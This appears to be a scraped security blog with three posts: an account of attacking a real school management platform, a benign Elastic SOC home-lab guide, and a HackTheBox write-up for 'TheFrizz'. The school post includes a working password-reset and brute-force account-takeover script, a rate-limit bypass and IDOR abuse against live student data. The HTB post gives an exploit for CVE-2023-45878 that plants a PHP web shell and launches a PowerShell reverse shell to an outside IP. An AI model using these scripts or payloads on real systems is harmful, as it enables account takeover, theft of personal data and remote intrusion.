[+] Triggering notification on evil PIPE \\dc01/pipe/9beef5cb-01af-4f26-9332-afd95a934ad9
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] CreatePipe success
[+] Command : "c:\Windows\System32\cmd.exe" /c type C:\Users\Administrator\Desktop\root.txt
[+] process with pid: 1256 created.

=====================================

b08435eda66c1aXXXXXXXXXXXXXXXXXX

[+] Process created, enjoy!

How I Hacked My School

Mon, 17 Mar 2025 00:00:00 GMT

My school used to rely on Odoo for managing almost everything, financials, students and teacher details, exams marks and more. For class schedules, they kept things simple with Google Sheets and Excel tables.

However, about a year ago, they switched to a new third-party Moroccan company that offered an all-in-one solution for schools and universities, including built-in SMS (School Magement System) features. This platform was gaining traction, as seen from their Play Store apps deployed for various schools. Sometimes, their subdomains even leaked in cached DNS entries on google since they hosted everything under redacted.com/u/SCHOOLNAME/ - u varied betwen u and e if it’s a school or a university, and schoolname was basically the project’s name.

From day one, I had a bad feeling about this platform. Something felt off. My spider senses were tingling about the security of the platform, and well… I wasn’t wrong.

For confidentiality reasons, I won’t reveal the company’s name.

I respect the work they’re doing, it’s impressive. But security-wise? Meh I don’t really know.

Again, I don’t know who specifically worked on this or under what circumstances, so I won’t judge too harshly.

This write-up is purely for educational purposes because I believe developers and security enthusiasts need to be aware of these kinds of issues.

Initial Recon: Understanding the System

At first, I didn’t have much to work with besides the mobile app that our school provided us, along with login credentials. So, I needed a way to analyze how the app communicated with its backend.

The plan? Debug the HTTPs traffic, to do so I would have to attach a proxy on the system.

But there was a catch, the app didn’t allow for user certificats by default. That meant I had to modify it.

Disassembling the APK

To get started, I decompiled the APK using APKTool:

  apktool d ENSI.apk -o ./ENSI

which gave up the app decompiled

This gave me access to the app’s internal files.

I then modified res/xml/network_security_config.xml by adding: <certificates src="user" />

I also verified that the AndroidManifest.xml referenced this configuration.

Once done, I rebuilt and signed the APK using jarsigner:

apktool b ENSI -o built_ensi.apk
keytool -genkey -v -keystore mykey.keystore -alias myalias -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore mykey.keystore built_ensi.apk myalias

Finally, I installed the modified app on my Android emulator.

Setting up Burp Proxy

Now that the app accepted custom certificates, I set up Burp Suite to intercept network traffic.

Created a listener on port 1337 (cause why not 😎).
Allowed all addresses.

Generated a certificate and installed it on the emulator.

Configured the emulator’s Wi-Fi proxy to forward traffic to my Kali machine (10.1.1.10:1337).

Right after that I simply copied the generated certf and added it to the emu via the security settings

Discovering API Endpoints

Almost immediately, I spotted the API endpoint that the app was connecting to.

Interestingly, when accessing it from a computer browser, it redirected to a completely different portal than the mobile app. This led me to believe there were two separate portals, one for administrators and one for students/parents.

I decided to shift my focus to the web version to see if I could uncover anything major. And I did.

Critical Password Reset Vulnerability

While analyzing the web client’s source, I found a password reset API endpoint that was completely exposed.

How did it work?

Anyone could access this endpoint publicly.
You just needed to supply an email address.
If the email was valid, the system would reset the password to a predictable pattern: ensiXXXX
The new password would be sent to the email inbox.

At first, I thought XXXX was fully randomized. But nope, only the last two digits changed 🤦🏻‍♂️.

This meant an attacker could easily brute-force any account in seconds. And since student emails were public (thanks to Google Classroom and Shared Email inbox), this was a major security flaw.

To demonstrate, I wrote a simple Python script to automate the attack:

import requests

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Linux; Android 4.2.2; Nexus 7 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Pragma": "no-cache"
}

def brute_password(email):
    pattern = "ensi20"
    password_dict = []
    
    for j in range(10):
        for k in range(10):
                password_dict.append(pattern + str(j) + str(k))
    
    for password in password_dict:
        data = {
            "login": email,
            "password": password
        }

        response = requests.post("https://REDACTED/u/ensit/botiapi/login", data=data, headers=HEADERS, allow_redirects=True)

        if "Login ou mot de passe est incorrecte." in response.text:
            pass
        elif "keyToken" in response.text:
            print(f"[SUCCESS] Login successful for email: {email} with password: {password}")
            # keyToken can be used here for further actions
            break

def reset_password(email):
    data = {
        "gsm": email,
        "op": "password"
    }

    response = requests.post("https://REDACTED/ensit/login", data=data, headers=HEADERS, allow_redirects=True)

    if "affecté à un aucun" in response.text:
        print(f"Invalid Email: {email}")
    elif "sms ou e-mail vous été envoyé avec" in response.text:
        print(f"[SUCCESS] Sent reset to {email}")
    else:
        print(f"[ERROR]")

if __name__ == "__main__":
    # Example email to test
    temail = "target@ensi.ma"
    
    reset_password(temail)
    brute_password(temail)

I could have used the web login here but I noticed that it was spiting errors when trying to login as a student or a parent, unlike the mobile API that allowed pretty much everything and even better returned a key token which can be used for further actions as we’ll see later in this paper.

So yeah, with the use of the POC script I was able to reset the password and brute-forced the new one within minutes. Scary.

Even worse? The system was using Cloudflare, but simply removing Cloudflare headers bypassed everything—no rate-limiting, no CAPTCHA, nothing.

With this, an attacker could:

Take over an administrator account.
Lock out all other users.
Gain full access.

From financial records to the entire database, including exam marks, teacher and student details, everything was accessible.

I didn’t want to dig too deep into the administration portal. I had a strong feeling there were more vulnerabilities to uncover, but tampering with a live production system was far too risky.

IDOR: Insecure Direct Object References

Now, back to the mobile endpoint. Immediately after logging in, the application returned a keyToken, which was essential for performing nearly every action in the app—fetching data, making edits, and more.

The core issue here was Insecure Direct Object References (IDOR). Take the absence endpoint as an example:

This GET request required user_id, parent_id, and eleve_id. The presence of eleve_id was a bit puzzling—why not just use user_id? The way they structured data seemed odd, but regardless, the request also included the keyToken returned at login and responded with a JSON object containing detailed absence records—justified/unjustified absences, exact dates and times, teacher names, class details, and more.

By simply modifying the eleve_id parameter in this request, I was able to retrieve other students’ absence records. This was a major flaw—a normal user, especially a student, shouldn’t have access to such sensitive data.

But it didn’t stop there—this issue was present in almost all mobile endpoints, including one that exposed personal account details by manipulating user_id:

Since user_id was included in previous requests, I decided to test whether modifying it would allow unauthorized actions. It did.

To confirm the severity, I asked a friend for permission to attempt a small change to his account—specifically, updating his phone number using my own token. Shockingly, the request went through successfully, proving that a student could modify another student’s account without any restrictions.

Here’s a list of vulnerable API endpoints that I found from a student’s perspective:

Endpoint	Functionality
ensit/REDACTED/suivi_pedagogique	Academic progress tracking
ensit/REDACTED/competences	Competencies overview
ensit/REDACTED/abscence	Absence records
ensit/REDACTED/translations	Language settings
ensit/REDACTED/translations	News and updates
ensit/REDACTED/album_photo	Student photo albums
ensit/REDACTED/cours_v2	Course details
ensit/REDACTED/demandes	Requests and forms
ensit/REDACTED/examens_v2	Exam results
ensit/REDACTED/compte	Account settings
ensit/REDACTED/discipline	Disciplinary records
ensit/REDACTED/contact	Contact details
ensit/REDACTED/devoirs	Homework assignments

After discovering these critical security flaws, I decided to stop, document everything, and report it directly to my school administration before going through any external channels. I wanted to ensure they were aware of the issue and had a chance to fix it before student data was exploited.

The goal of this test wasn’t to gain anything, it was about confirming whether the platform storing our personal data was secure. Unfortunately, it wasn’t. I didn’t ask for a bounty or any reward, I just wanted them to fix their mess before it became a real problem for everyone.

Setting up a SOC Home Lab

Sun, 16 Mar 2025 00:00:00 GMT

Building a SOC Home Lab 1/3

The purpose of this SOC (Security Operations Center) Analyst Lab was to gain hands-on experience in security monitoring and log analysis. This lab provided a controlled environment to experiment with the Elastic Stack (Elasticsearch, Logstash, and Kibana), enabling me to develop practical skills in collecting, processing, and visualizing security data.

In a real-world production environment, we would implement strict firewall rules and segment components across multiple VPCs to enhance security and control access. However for the sake of simplicity and ease of use, this lab operates within a single unrestricted VPC, allowing seamless communication between all components without additional networking configurations.

Network Structure

Virtual Private Cloud:
- All components are placed within a single VPC without firewall restrictions to streamline setup and testing.
- This design enables easy interaction between different elements of the Elastic Stack.
Elastic Stack Components:
- Elasticsearch Server: The core storage and search engine for log data.
- Kibana: A visualization and management interface for analyzing logs, configuring dashboards, and setting up alerts.
- Fleet Server: Manages Elastic Agents, handling log ingestion and configuration updates.
Log Sources & Agents:
- Windows Server with Elastic Agent: Collects logs from Windows systems, including Sysmon and Windows Defender events.
- Ubuntu Server with Elastic Agent: Gathers Linux system logs, SSH authentication attempts, and syslog events.
- Elastic Agents: Installed on both Windows and Ubuntu servers to forward logs to Elasticsearch.

ElasticSearch

Source

First, we download ElasticSearch and install it on the Ubuntu server:

sudo dpkg -i elasticsearch-8.17.3-amd64.deb

After installation, we take note of the important information ElasticSearch provides!

--------------------------- Security autoconfiguration information ------------------------------

Authentication and authorization are enabled.
TLS for the transport and HTTP layers is enabled and configured.

The generated password for the elastic built-in superuser is : ZfiRLqnfkK=1l8RyvxO0

If this node should join an existing cluster, you can reconfigure this with
'/usr/share/elasticsearch/bin/elasticsearch-reconfigure-node --enrollment-token <token-here>'
after creating an enrollment token on your existing cluster.

You can complete the following actions at any time:

Reset the password of the elastic built-in superuser with
'/usr/share/elasticsearch/bin/elasticsearch-reset-password -u elastic'.

Generate an enrollment token for Kibana instances with
 '/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s kibana'.

Generate an enrollment token for Elasticsearch nodes with
'/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node'.

-------------------------------------------------------------------------------------------------
### NOT starting on installation, please execute the following statements to configure elasticsearch service to start automatically using systemd
 sudo systemctl daemon-reload
 sudo systemctl enable elasticsearch.service
### You can start elasticsearch service by executing
 sudo systemctl start elasticsearch.service

Next, we need to edit the ElasticSearch configuration file to allow external clients within the same NAT to access ElasticSearch using the machine's static IP (10.1.1.3).

We open the configuration file:

sudo nano /etc/elasticsearch/elasticsearch.yml

Inside, we look for the network.host setting and change it to our static IP, we also uncomment the http.port

This allows ElasticSearch to listen for connections on this IP instead of just localhost.

Then we enable the service and starts it!

walidpyh@blume-ek01:~$ sudo systemctl daemon-reload
walidpyh@blume-ek01:~$ sudo systemctl enable elasticsearch.service
Created symlink /etc/systemd/system/multi-user.target.wants/elasticsearch.service → /lib/systemd/system/elasticsearch.service.
walidpyh@blume-ek01:~$ sudo systemctl start elasticsearch.service

Kibana

Source

Now, let's proceed with installing Kibana.

Before we start using Kibana, we need to tweak a configuration file located at /etc/kibana/kibana.yml.

To do this, uncomment both the server host and set the port. Make sure to configure the host with your static IP address.

After that, enable and start the Kibana service with the following commands:

walidpyh@blume-ek01:~$ sudo systemctl daemon-reload
walidpyh@blume-ek01:~$ sudo systemctl enable kibana.service
Created symlink /etc/systemd/system/multi-user.target.wants/kibana.service → /lib/systemd/system/kibana.service.
walidpyh@blume-ek01:~$ sudo systemctl start kibana.service

At this point, before we can access Kibana, we need to generate an Elasticsearch enrollment token. To do this, run the following command sudo /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s kibana

This will output an enrollment token that looks something like this:

enrollment-token -s kibana
eyJ2ZXIiOiI4LjE0LjAiLCJhZHIiOlsiMTAuMS4xLjM6OTIwMCJdLCJmZ3IiOiJjMjdmMGNkMzFlMmZmMGI5NmYwYmEyZWIzZDlhYjdiZTViOTdkODBmMWU3YjE1OGExM2IxOWVkMjVhMGVmYTc5Iiwia2V5IjoiamVGa2NwVUJMMzRGUjRmQXRQbWg6cWhTWXVXVEZTdkt1QVRuU1dHZzdNdyJ9

Now, we’re ready to access Kibana using the token we just generated!

http://10.1.1.3:5601/

Its asking for a Verification code

We can easily obtain the it by running: sudo /usr/share/kibana/bin/kibana-verification-code

Now, we can access Kibana using the login credentials that Elasticsearch provided us during the installation, which were: elastic:ZfiRLqnfkK=1l8RyvxO0

Before we move further in this lab, I’ll quickly set up an encryption key to be used by Kibana. Without this, we’ll get warnings about it, as we can see here in the Security > Alerts section.

To generate the encryption key, run: sudo /usr/share/kibana/bin/kibana-encryption-keys generate

walidpyh@blume-ek01:~$ sudo /usr/share/kibana/bin/kibana-encryption-keys generate
## Kibana Encryption Key Generation Utility

The 'generate' command guides you through the process of setting encryption keys for:

xpack.encryptedSavedObjects.encryptionKey
    Used to encrypt stored objects such as dashboards and visualizations
    https://www.elastic.co/guide/en/kibana/current/xpack-security-secure-saved-objects.html#xpack-security-secure-saved-objects

xpack.reporting.encryptionKey
    Used to encrypt saved reports
    https://www.elastic.co/guide/en/kibana/current/reporting-settings-kb.html#general-reporting-settings

xpack.security.encryptionKey
    Used to encrypt session information
    https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html#security-session-and-cookie-settings

Already defined settings are ignored and can be regenerated using the --force flag.  Check the documentation links for instructions on how to rotate encryption keys.
Definitions should be set in the kibana.yml used configure Kibana.

Settings:
xpack.encryptedSavedObjects.encryptionKey: 9a38bbe1431a1fd4dfda39d6611bc33c
xpack.reporting.encryptionKey: d730a9893b8e9284d72ae19ce1af5fd8
xpack.security.encryptionKey: fb6339a2ec0b6592fea12b329a79500b

Perfect! Now we just need to add these encryptionKeys using /usr/share/kibana/bin/kibana-keystore add

walidpyh@blume-ek01:~$ sudo /usr/share/kibana/bin/kibana-keystore add xpack.encryptedSavedObjects.encryptionKey
Enter value for xpack.encryptedSavedObjects.encryptionKey: ********************************
walidpyh@blume-ek01:~$ sudo /usr/share/kibana/bin/kibana-keystore add xpack.reporting.encryptionKey
Enter value for xpack.reporting.encryptionKey: ********************************
walidpyh@blume-ek01:~$ sudo /usr/share/kibana/bin/kibana-keystore add xpack.security.encryptionKey
Enter value for xpack.security.encryptionKey: ********************************

And restart the service, sudo systemctl restart kibana.service

Fleet Server

Let’s imagine we’ve already installed our agents on around 100 servers. After completing the setup, we log into Kibana, ready to dive into those juicy PowerShell logs we’ve been eagerly awaiting, only to find that we initially forgot to configure the agent to forward them. Dang it!

In this case, you have a couple of options. You can either manually go to each server and machine to reconfigure the agent, or you can use a Group Policy to modify all those Windows endpoints. Alternatively, we can take advantage of a magical component that connects Elastic Agents to a Fleet Server, allowing us to manage all the agents from our centralized server! This is what we’ll be setting up in this section.

But first, let’s answer the question: what is an Elastic Agent?

An Elastic Agent is essentially a service that provides us with a unified way to monitor logs, metrics, and various other types of data. These agents work based on policies that we can configure and update to our preferences. There are two installation methods for an agent:

Managed by Fleet: The Elastic Agent policies and lifecycle are centrally managed by the Fleet app in Kibana. The Integrations app also lets you centrally add integrations with other popular services and systems. This is the recommended option for most users.
Standalone Mode: All policies are applied to the Elastic Agent manually through a YAML file. This is intended for more advanced users. See Install standalone Elastic Agents for more information.

But let’s not forget about Beats!

Beats are lightweight data shippers that send operational data to Elasticsearch. Elastic provides separate Beats for different types of data, such as logs, metrics, and uptime. Depending on the data you want to collect, you might need to install multiple shippers on a single host.

In this case, we won’t be using them, since their use case is more specific. While Beats can be useful in certain scenarios, for this setup, an Elastic Agent will suffice because we want to collect everything. Using Beats in this case would be inconvenient, as it would require setting up multiple shippers, whereas an agent handles it all.

Here’s a table showing the differences between Beats and Elastic Agents, just in case anyone is curious:

Ok, back to the Fleet setup. To begin, we need to go to the Elastic Dashboard>Management>Fleet

Next, click on Add Fleet Server.

In this case, we’ll go with the Quick Start option, but I’d recommend choosing the Advanced option for production environments. For now, let’s just give it a name and set the URL to the Fleet server’s IP address. Note that, by default, it will be using port 8220. Once that's done, click Generate Fleet Server Policy.

After a few seconds, we’ll get a confirmation with the Fleet Server details, including the host and installation instructions.

Now, just run those commands on the Fleet Ubuntu server, and it will successfully enroll.

Windows Agent

Next, we continue with the Elastic Agent process. First, we create a new Windows policy.

Great! Now we can simply copy the agent download command for the OS we're working with. In this case, I’ll start with my Windows Server, so I’ll copy the PowerShell command and run it there.

However, before running the command, we need to return to our Fleet settings and change the default port 443 to 8220 (the one we created for our Fleet server) to ensure everything works correctly. We’ll also need to update the PowerShell command to reflect this change and add --insecure to bypass the generated certificate errors.

Now that our Windows server has been added and the agent is running as a service, if we go to the Discover section in our Elastic Dashboard, we should start seeing logs there!

Sysmon

Even though we’re now receiving logs from the Windows agent, they don’t track important events like process creation. This is because the default logging configuration isn’t set up to capture those events. We have two options: we can either reconfigure the auditing settings to enable these events, or we can simply install Sysmon!

Sysmon (System Monitor) can monitor a wide range of events such as process creation, network connections, file operations, and more. It’s highly customizable and extremely useful. For more details about Sysmon and its event IDs, check out the official documentation.

We’ll also be using the Olaf Sysmon configuration, which can be found here.

Put this configuration file in the same folder as Sysmon, then open PowerShell and run the following command:

PS C:\Users\Administrator\Downloads\Sysmon> dir

    Directory: C:\Users\Administrator\Downloads\Sysmon

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/7/2025   3:18 PM           7490 Eula.txt
-a----          3/7/2025   3:18 PM        8480560 Sysmon.exe
-a----          3/7/2025   3:18 PM        4563248 Sysmon64.exe
-a----          3/7/2025   3:18 PM        4993440 Sysmon64a.exe
-a----          3/7/2025  10:23 PM         253169 sysmonconfig.xml

PS C:\Users\Administrator\Downloads\Sysmon> .\Sysmon64.exe -c sysmonconfig.xml

System Monitor v15.15 - System activity monitor
By Mark Russinovich and Thomas Garnier
Copyright (C) 2014-2024 Microsoft Corporation
Using libxml2. libxml2 is Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved.
Sysinternals - www.sysinternals.com

Loading configuration file with schema version 4.90
Configuration file validated.
Configuration updated.

Now, we need to add the Sysmon integration in Elastic.

We can do this by adding the Custom Windows Event Logs integration.

After selecting this option, it will ask us for a channel name.

To find the channel name, open Event Viewer, then navigate to > Application and Services Logs > Microsoft > Windows > Sysmon. Right-click Operational, access its properties, and copy the Full Name—this will be the channel name.

Next, for the Agent Policy, choose to add it to Existing hosts and select the one we created for the Windows machines.

Now, let’s do the same for collecting Defender Logs. Add a new Custom Log, name it WIN-Defender, and for the channel name, choose Operational again!

However, there’s one issue: Defender can be quite spammy with many events we don’t really need, like health reports, stats, and other informational events. So, we’ll only focus on the following critical ones:

Event ID 1116
- Symbolic name: MALWAREPROTECTION_STATE_MALWARE_DETECTED
- Message: The antimalware platform detected malware or other potentially unwanted software.
- Description: Microsoft Defender Antivirus detected malware or other potentially unwanted software.
Event ID 1117
- Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_TAKEN
- Message: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.
- Description: Microsoft Defender Antivirus took action to protect this machine from malware or other potentially unwanted software.
Event ID 5001
- Symbolic name: MALWAREPROTECTION_RTP_DISABLED
- Message: Real-time protection is disabled.
- Description: Microsoft Defender Antivirus real-time protection scanning for malware and other potentially unwanted software was disabled.

Source

To filter these events, we need to click on Advanced and include the Event IDs as shown above.

As we did with Sysmon, deploy it to Existing Hosts and then to the Windows policies. Now we should have both Sysmon and Windows Defender events added to our event ingestion pipeline, forwarded from the agent.

Now, if we go back to Discover and filter by winlog.event_id: "1", which corresponds to ProcessCreate in Sysmon, we’ll get the following results:

We can also see WinDefender logs as shown here. (I tried to disable Defender to trigger the relevant event).

Ubuntu Agent

Just like we did with Windows, we’ll now create a policy and set up an agent for an Ubuntu server to see how logs are handled from a Linux perspective.

First, we create a policy of course.

Before continuing with the agent setup, let’s take a quick look at the policy we just created. By default, it includes a system integration, which means it will automatically log system authentication events and syslog messages.

The authentication logs contain various login-related events, which will be more than enough for our initial setup. This will allow us to experiment with Elastic and even create some Kibana charts!

Now, onto the agent setup—nothing too fancy here.

We take the provided installation command and add --insecure to prevent SSL issues (of course, this is just for testing; in a production environment, we’d want proper SSL configuration).

Once installed, the agent should be up and running!

Alerts

SSH BruteForce

When it comes to brute-force attacks, the main thing we want to look for in our logs is failed authentication attempts. Attackers typically try multiple login attempts until they find valid credentials. By monitoring failed SSH authentication logs, we can detect these types of attacks early.

To start, we go to the Discovery section and filter logs based on our agent.name, which corresponds to our Ubuntu server. Since we’re focusing on SSH authentication, we also add a filter to check if system.auth.ssh.event exists: system.auth.ssh.event : *

After running this query, we see around 14 log entries (I manually triggered some failed SSH attempts beforehand using both existing and non-existing usernames to populate the logs).

By inspecting the available fields, we find several useful ones for filtering and building a detailed table, including username, source.ip, and system.auth.ssh.event. In my case, everything was local, so I couldn't use geo-location on the IP addresses. However, if you're dealing with external traffic, you could use it to map where these attacks are coming from and even create a visual graph!

Now that we have a refined query, we can create an alert directly from it by clicking on the “Alerts” tab at the top.

For this example, I set the alert to trigger if there are more than five failed authentication attempts within five minutes. Obviously, this isn’t a great threshold for real-world security, but it works well for testing purposes in our controlled environment.

At this stage, we won’t configure any actions, but Elastic provides plenty of options if you need to monitor something critical. You can set alerts to automatically notify you via email, webhook, Slack, Microsoft Teams, and more!

There is also another type of Alerts/Rules under Security section that is worth mentioning since it offers far more customization and details

Dashboards

When it comes to dashboards, the setup is pretty straightforward and depends on the type of data you want to visualize. You can experiment as much as you want!

For example, here’s a simple table that shows usernames along with the number of failed and successful login attempts:

Or, if you’re feeling lazy (like me), you can grab a pre-made dashboard template and customize it to fit your needs. Here’s an example using [Logs System] SSH login attempts:

This same approach can be applied to a wide range of events. You could create one dashboard for monitoring critical Linux logs, another for tracking Windows events, and others for services like Remote Desktop, SMB, or any other logs that matter to you!

TheFrizz - HTB

Sat, 15 Mar 2025 00:00:00 GMT

TheFrizz (10.10.11.60)

Enumeration & Data Gathering

rustscan -a 10.10.11.60 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.60:22
Open 10.10.11.60:53
Open 10.10.11.60:80
Open 10.10.11.60:88
Open 10.10.11.60:135
Open 10.10.11.60:139
Open 10.10.11.60:389
Open 10.10.11.60:445
Open 10.10.11.60:464
Open 10.10.11.60:593
Open 10.10.11.60:636
Open 10.10.11.60:3268
Open 10.10.11.60:3269
Open 10.10.11.60:9389
Open 10.10.11.60:49664
Open 10.10.11.60:49668
Open 10.10.11.60:49670
Open 10.10.11.60:50289
Open 10.10.11.60:50293
Open 10.10.11.60:50302
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.60
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 00:39 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
Initiating SYN Stealth Scan at 00:39
Scanning frizzdc.frizz.htb (10.10.11.60) [20 ports]
Discovered open port 22/tcp on 10.10.11.60
Discovered open port 445/tcp on 10.10.11.60
Discovered open port 139/tcp on 10.10.11.60
Discovered open port 135/tcp on 10.10.11.60
Discovered open port 80/tcp on 10.10.11.60
Discovered open port 53/tcp on 10.10.11.60
Discovered open port 50293/tcp on 10.10.11.60
Discovered open port 49670/tcp on 10.10.11.60
Discovered open port 50289/tcp on 10.10.11.60
Discovered open port 49668/tcp on 10.10.11.60
Discovered open port 3268/tcp on 10.10.11.60
Discovered open port 593/tcp on 10.10.11.60
Discovered open port 9389/tcp on 10.10.11.60
Discovered open port 50302/tcp on 10.10.11.60
Discovered open port 636/tcp on 10.10.11.60
Discovered open port 464/tcp on 10.10.11.60
Discovered open port 88/tcp on 10.10.11.60
Discovered open port 389/tcp on 10.10.11.60
Discovered open port 3269/tcp on 10.10.11.60
Discovered open port 49664/tcp on 10.10.11.60
Completed SYN Stealth Scan at 00:39, 0.13s elapsed (20 total ports)
NSE: Script scanning 10.10.11.60.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:39
NSE Timing: About 93.99% done; ETC: 00:40 (0:00:02 remaining)
NSE Timing: About 96.31% done; ETC: 00:40 (0:00:02 remaining)
NSE Timing: About 96.95% done; ETC: 00:41 (0:00:03 remaining)
Completed NSE at 00:41, 98.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
Nmap scan report for frizzdc.frizz.htb (10.10.11.60)
Host is up, received user-set (0.050s latency).
Scanned at 2025-03-17 00:39:44 +00 for 99s

PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack ttl 127
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
| http-title: Education &mdash; Walkerville Elementary School
|_Requested resource was http://frizzdc.frizz.htb/home/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49668/tcp open  unknown          syn-ack ttl 127
49670/tcp open  unknown          syn-ack ttl 127
50289/tcp open  unknown          syn-ack ttl 127
50293/tcp open  unknown          syn-ack ttl 127
50302/tcp open  unknown          syn-ack ttl 127

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 1m45s
| smb2-time: 
|   date: 2025-03-17T00:41:33
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 21203/tcp): CLEAN (Timeout)
|   Check 2 (port 49016/tcp): CLEAN (Timeout)
|   Check 3 (port 49509/udp): CLEAN (Timeout)
|   Check 4 (port 31256/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:41
Completed NSE at 00:41, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 99.13 seconds
           Raw packets sent: 20 (880B) | Rcvd: 20 (880B)

Gibbon v25.0.00
- CVE-2023-34598 - Local File Inclusion (POC)
- CVE-2023-45878 - Arbitrary File Write (POC)

Since I knew the exact framework and version in use, I went to their GitHub repository and cloned a copy for further analysis. This allowed me to get familiar with the folder structure, scripts, and overall functionality of the application.

Exploitation

At first, I only had an LFI (Local File Inclusion) vulnerability (CVE), so I tried leveraging it with the information I had. My first step was attempting to dump gibbon.sql and composer.json to check for any interesting data.

Payloads used:

http://frizzdc.frizz.htb/Gibbon-LMS/index.php?q=./gibbon.sql

The SQL file contained a reference to Fiona Frizzle:

It also mentioned migrating to Azure Active Directory SSO, but in the meantime, they were using Kerberos.

Aside from that, I couldn’t leverage LFI to retrieve anything else useful. The composer.json file only confirmed the use of PHP 7.3.

I then searched for more vulnerabilities and found CVE-2023-45878 along with this paper from the usd HeroLab team. This exploit allows an unauthenticated user to write files via a vulnerable endpoint, which I used to gain a shell on the machine.

Here’s the crafted PoC:

import requests
import base64

IP_Address = "10.10.XX.XXX"
Port = "8005"

# Target URL of the vulnerable Gibbon LMS instance
url = "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
php_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
shell_payload = f"powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient%28%27{IP_Address}%27%2C%20{Port}%29%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream%28%29%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter%28%24NetworkStream%29%3Bfunction%20WriteToStream%20%28%24String%29%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write%28%24String%20%2B%20%27SHELL%3E%20%27%29%3B%24StreamWriter.Flush%28%29%7DWriteToStream%20%27%27%3Bwhile%28%28%24BytesRead%20%3D%20%24NetworkStream.Read%28%24Buffer%2C%200%2C%20%24Buffer.Length%29%29%20-gt%200%29%20%7B%24Command%20%3D%20%28%5Btext.encoding%5D%3A%3AUTF8%29.GetString%28%24Buffer%2C%200%2C%20%24BytesRead%20-%201%29%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20%28%24Output%29%7D%24StreamWriter.Close%28%29%22"
encoded_php_payload = base64.b64encode(php_payload.encode()).decode()
path = "ctos.php"
gibbonPersonID = "0000000001"
payload = {
    "img": f"image/png;asdf,{encoded_php_payload}",
    "path": path,
    "gibbonPersonID": gibbonPersonID
}

response = requests.post(url, data=payload)

if response.status_code == 200:
    print(f"Payload sent successfully!")
    response = requests.get(f"http://frizzdc.frizz.htb/Gibbon-LMS/{path}?cmd={shell_payload}")
    print(f"Executed the shell!")
else:
    print(f"Failed to send payload. HTTP status code: {response.status_code}")

